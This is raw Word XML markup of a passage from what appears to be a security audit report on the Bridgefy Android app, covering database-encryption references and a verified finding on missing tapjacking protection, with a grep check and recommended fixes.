          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Room.databaseBuilder( </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>context,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="1907" w:right="2112" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>BridgefyDatabase::</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>BridgefyDatabase.DATABASE_NAME</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1907" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.openHelperFactory(supportFactory)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1907" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.addMigrations[...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="70"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487629312">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>208667</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="108" name="Graphic 108"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="108" name="Graphic 108"/>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6.430517pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15687168;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape81" coordorigin="1440,329" coordsize="2880,0" path="m1440,329l4320,329e" filled="false" stroked="true" strokeweight=".75pt" strokecolor="#000000">
                <v:path arrowok="t"/>
                <v:stroke dashstyle="solid"/>
                <w10:wrap type="topAndBottom"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="110"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>168</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="32"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId255">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://github.com/firebase/firebase-android-sdk/issues/1681</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>169</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="76"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId256">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://github.com/sqlcipher/android-database-sqlcipher#using-sqlcipher-for-android-with-</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-4"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>room</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>170</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="45"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId257">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://mas.owasp.org/MASTG/Android/0x05d-Testing-Data-Storage/#sqlite-database-unencrypted</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>171</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="20"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId258">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://mas.owasp.org/MASTG/Android/0x05d-Testing-Data-Storage/#keystore</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>172</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId259">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://developer.android.com/jetpack/androidx/releases/room</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="182"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250018" w:id="37"/>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-034</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>WP1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Config</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Hardening</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Recommendations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="1154CC"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Info</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="368"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Retest Notes: </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Fix Verified. The Bridgefy team resolved this issue and 7ASecurity verified that the fix is valid.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>staging</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>3.0.18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(318)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>build</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>was</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>found</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to implement the proposed mitigation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="364"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It was found that the Bridgefy Android app fails to leverage optimal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>values</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>number of security-related settings. This unnecessarily weakens the overall security posture of the application. For example, the application fails to mitigate potential tapjacking and screen capture attacks. These weaknesses are documented in more detail next.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Missing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Tapjacking</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Protection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="363"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The Android app accepts user taps while other apps render anything on top of it. Malicious attackers might leverage this weakness to impersonate users using a crafted app, which launches the victim app in the background while something</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>else</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>rendered on top. The following command confirms that Tapjacking protections are missing on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the source code provided and the decompiled app:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>grep -r </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'filterTouchesWhenObscured' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>* | wc -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="112"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="720" w:right="364"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It is recommended to implement the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>filterTouchesWhenObscured</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>173174</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> attribute at the Android WebView level</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>175</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>. This will ensure that taps will be ignored when the Android app is not displayed on top.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Missing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>FLAG_SECURE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
